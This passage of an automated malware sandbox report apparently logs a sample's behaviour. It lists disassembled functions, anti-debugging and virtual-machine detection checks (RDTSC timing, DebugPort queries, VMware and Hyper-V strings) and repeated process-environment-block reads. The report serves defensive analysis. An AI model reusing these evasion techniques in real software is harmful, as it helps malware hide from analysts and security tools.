          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: 2_2_0188D0D1 push ecx; ret 2_2_0188D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exe -- Code function: 11_2_0488D0D1 push ecx; ret 11_2_0488D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exe -- Code function: 11_2_008BB3C5 push eax; ret 11_2_008BB418
          Source: C:\Windows\SysWOW64\cmmon32.exe -- Code function: 11_2_008BB41B push eax; ret 11_2_008BB482
          Source: C:\Windows\SysWOW64\cmmon32.exe -- Code function: 11_2_008BB412 push eax; ret 11_2_008BB418
          Source: C:\Windows\SysWOW64\cmmon32.exe -- Code function: 11_2_008BB47C push eax; ret 11_2_008BB482
          Source: C:\Windows\SysWOW64\cmmon32.exe -- Code function: 11_2_008B4E34 push eax; iretd 11_2_008B4E36
          Source: C:\Windows\SysWOW64\cmmon32.exe -- Code function: 11_2_008B4F6B push ebp; retf 11_2_008B4F6C
          Source: C:\Windows\SysWOW64\cmmon32.exe -- Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000008A85F4 second address: 00000000008A85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000008A898E second address: 00000000008A8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6392 Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 0_2_002F431C FindFirstFileExW, 0_2_002F431C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_002F431C FindFirstFileExW, 2_2_002F431C
          Source: explorer.exe, 00000004.00000000.704668581.0000000004710000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.689957122.000000000FD60000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.674578676.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.680786469.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.675830821.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.680786469.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: cmmon32.exe, 0000000B.00000002.915231564.0000000000C47000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.680948462.000000000A716000.00000004.00000001.sdmp Binary or memory string: 0ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.671975391.0000000004755000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.674578676.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.680948462.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.674578676.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.681026627.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000000.674578676.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_00409B30 LdrLoadDll, 2_2_00409B30
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 0_2_002F3D62 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_002F3D62
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 0_2_00304C25 mov eax, dword ptr fs:[00000030h] 0_2_00304C25
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 0_2_002F2E0B mov eax, dword ptr fs:[00000030h] 0_2_002F2E0B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 0_2_011306DA mov eax, dword ptr fs:[00000030h] 0_2_011306DA
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 0_2_0113099F mov eax, dword ptr fs:[00000030h] 0_2_0113099F
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 0_2_011309DE mov eax, dword ptr fs:[00000030h] 0_2_011309DE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 0_2_011308EE mov eax, dword ptr fs:[00000030h] 0_2_011308EE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 0_2_01130A1C mov eax, dword ptr fs:[00000030h] 0_2_01130A1C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_002F2E0B mov eax, dword ptr fs:[00000030h] 2_2_002F2E0B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186A185 mov eax, dword ptr fs:[00000030h] 2_2_0186A185
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0185C182 mov eax, dword ptr fs:[00000030h] 2_2_0185C182
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01862581 mov eax, dword ptr fs:[00000030h] 2_2_01862581
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01862581 mov eax, dword ptr fs:[00000030h] 2_2_01862581
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01862581 mov eax, dword ptr fs:[00000030h] 2_2_01862581
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01862581 mov eax, dword ptr fs:[00000030h] 2_2_01862581
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01832D8A mov eax, dword ptr fs:[00000030h] 2_2_01832D8A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01832D8A mov eax, dword ptr fs:[00000030h] 2_2_01832D8A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01832D8A mov eax, dword ptr fs:[00000030h] 2_2_01832D8A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01832D8A mov eax, dword ptr fs:[00000030h] 2_2_01832D8A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01832D8A mov eax, dword ptr fs:[00000030h] 2_2_01832D8A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01862990 mov eax, dword ptr fs:[00000030h] 2_2_01862990
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186FD9B mov eax, dword ptr fs:[00000030h] 2_2_0186FD9B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186FD9B mov eax, dword ptr fs:[00000030h] 2_2_0186FD9B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018661A0 mov eax, dword ptr fs:[00000030h] 2_2_018661A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018661A0 mov eax, dword ptr fs:[00000030h] 2_2_018661A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018635A1 mov eax, dword ptr fs:[00000030h] 2_2_018635A1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B69A6 mov eax, dword ptr fs:[00000030h] 2_2_018B69A6
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01861DB5 mov eax, dword ptr fs:[00000030h] 2_2_01861DB5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01861DB5 mov eax, dword ptr fs:[00000030h] 2_2_01861DB5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01861DB5 mov eax, dword ptr fs:[00000030h] 2_2_01861DB5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B51BE mov eax, dword ptr fs:[00000030h] 2_2_018B51BE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B51BE mov eax, dword ptr fs:[00000030h] 2_2_018B51BE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B51BE mov eax, dword ptr fs:[00000030h] 2_2_018B51BE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B51BE mov eax, dword ptr fs:[00000030h] 2_2_018B51BE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_019005AC mov eax, dword ptr fs:[00000030h] 2_2_019005AC
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_019005AC mov eax, dword ptr fs:[00000030h] 2_2_019005AC
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6DC9 mov eax, dword ptr fs:[00000030h] 2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6DC9 mov eax, dword ptr fs:[00000030h] 2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6DC9 mov eax, dword ptr fs:[00000030h] 2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6DC9 mov ecx, dword ptr fs:[00000030h] 2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6DC9 mov eax, dword ptr fs:[00000030h] 2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6DC9 mov eax, dword ptr fs:[00000030h] 2_2_018B6DC9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0183B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0183B1E1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0183B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0183B1E1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0183B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0183B1E1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018C41E8 mov eax, dword ptr fs:[00000030h] 2_2_018C41E8
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0184D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0184D5E0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0184D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0184D5E0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018FFDE2 mov eax, dword ptr fs:[00000030h] 2_2_018FFDE2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018FFDE2 mov eax, dword ptr fs:[00000030h] 2_2_018FFDE2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018FFDE2 mov eax, dword ptr fs:[00000030h] 2_2_018FFDE2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018FFDE2 mov eax, dword ptr fs:[00000030h] 2_2_018FFDE2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018E8DF1 mov eax, dword ptr fs:[00000030h] 2_2_018E8DF1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01839100 mov eax, dword ptr fs:[00000030h] 2_2_01839100
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01839100 mov eax, dword ptr fs:[00000030h] 2_2_01839100
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01839100 mov eax, dword ptr fs:[00000030h] 2_2_01839100
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01908D34 mov eax, dword ptr fs:[00000030h] 2_2_01908D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01854120 mov eax, dword ptr fs:[00000030h] 2_2_01854120
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01854120 mov eax, dword ptr fs:[00000030h] 2_2_01854120
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01854120 mov eax, dword ptr fs:[00000030h] 2_2_01854120
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01854120 mov eax, dword ptr fs:[00000030h] 2_2_01854120
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01854120 mov ecx, dword ptr fs:[00000030h] 2_2_01854120
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01843D34 mov eax, dword ptr fs:[00000030h] 2_2_01843D34
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0183AD30 mov eax, dword ptr fs:[00000030h] 2_2_0183AD30
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018FE539 mov eax, dword ptr fs:[00000030h] 2_2_018FE539
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186513A mov eax, dword ptr fs:[00000030h] 2_2_0186513A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186513A mov eax, dword ptr fs:[00000030h] 2_2_0186513A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018BA537 mov eax, dword ptr fs:[00000030h] 2_2_018BA537
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01864D3B mov eax, dword ptr fs:[00000030h] 2_2_01864D3B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01864D3B mov eax, dword ptr fs:[00000030h] 2_2_01864D3B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01864D3B mov eax, dword ptr fs:[00000030h] 2_2_01864D3B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0185B944 mov eax, dword ptr fs:[00000030h] 2_2_0185B944
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0185B944 mov eax, dword ptr fs:[00000030h] 2_2_0185B944
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01873D43 mov eax, dword ptr fs:[00000030h] 2_2_01873D43
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B3540 mov eax, dword ptr fs:[00000030h] 2_2_018B3540
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01857D50 mov eax, dword ptr fs:[00000030h] 2_2_01857D50
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0183C962 mov eax, dword ptr fs:[00000030h] 2_2_0183C962
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0183B171 mov eax, dword ptr fs:[00000030h] 2_2_0183B171
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0183B171 mov eax, dword ptr fs:[00000030h] 2_2_0183B171
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0185C577 mov eax, dword ptr fs:[00000030h] 2_2_0185C577
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0185C577 mov eax, dword ptr fs:[00000030h] 2_2_0185C577
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01839080 mov eax, dword ptr fs:[00000030h] 2_2_01839080
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B3884 mov eax, dword ptr fs:[00000030h] 2_2_018B3884
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B3884 mov eax, dword ptr fs:[00000030h] 2_2_018B3884
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0184849B mov eax, dword ptr fs:[00000030h] 2_2_0184849B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h] 2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h] 2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h] 2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h] 2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h] 2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018620A0 mov eax, dword ptr fs:[00000030h] 2_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018790AF mov eax, dword ptr fs:[00000030h] 2_2_018790AF
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0186F0BF
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186F0BF mov eax, dword ptr fs:[00000030h] 2_2_0186F0BF
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186F0BF mov eax, dword ptr fs:[00000030h] 2_2_0186F0BF
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01908CD6 mov eax, dword ptr fs:[00000030h] 2_2_01908CD6
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018CB8D0 mov ecx, dword ptr fs:[00000030h] 2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_018CB8D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018358EC mov eax, dword ptr fs:[00000030h] 2_2_018358EC
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F14FB mov eax, dword ptr fs:[00000030h] 2_2_018F14FB
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6CF0 mov eax, dword ptr fs:[00000030h] 2_2_018B6CF0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6CF0 mov eax, dword ptr fs:[00000030h] 2_2_018B6CF0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6CF0 mov eax, dword ptr fs:[00000030h] 2_2_018B6CF0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6C0A mov eax, dword ptr fs:[00000030h] 2_2_018B6C0A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6C0A mov eax, dword ptr fs:[00000030h] 2_2_018B6C0A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6C0A mov eax, dword ptr fs:[00000030h] 2_2_018B6C0A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B6C0A mov eax, dword ptr fs:[00000030h] 2_2_018B6C0A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01904015 mov eax, dword ptr fs:[00000030h] 2_2_01904015
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01904015 mov eax, dword ptr fs:[00000030h] 2_2_01904015
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F1C06 mov eax, dword ptr fs:[00000030h] 2_2_018F1C06
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B7016 mov eax, dword ptr fs:[00000030h] 2_2_018B7016
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B7016 mov eax, dword ptr fs:[00000030h] 2_2_018B7016
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B7016 mov eax, dword ptr fs:[00000030h] 2_2_018B7016
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0190740D mov eax, dword ptr fs:[00000030h] 2_2_0190740D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0190740D mov eax, dword ptr fs:[00000030h] 2_2_0190740D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0190740D mov eax, dword ptr fs:[00000030h] 2_2_0190740D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186BC2C mov eax, dword ptr fs:[00000030h] 2_2_0186BC2C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186002D mov eax, dword ptr fs:[00000030h] 2_2_0186002D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186002D mov eax, dword ptr fs:[00000030h] 2_2_0186002D
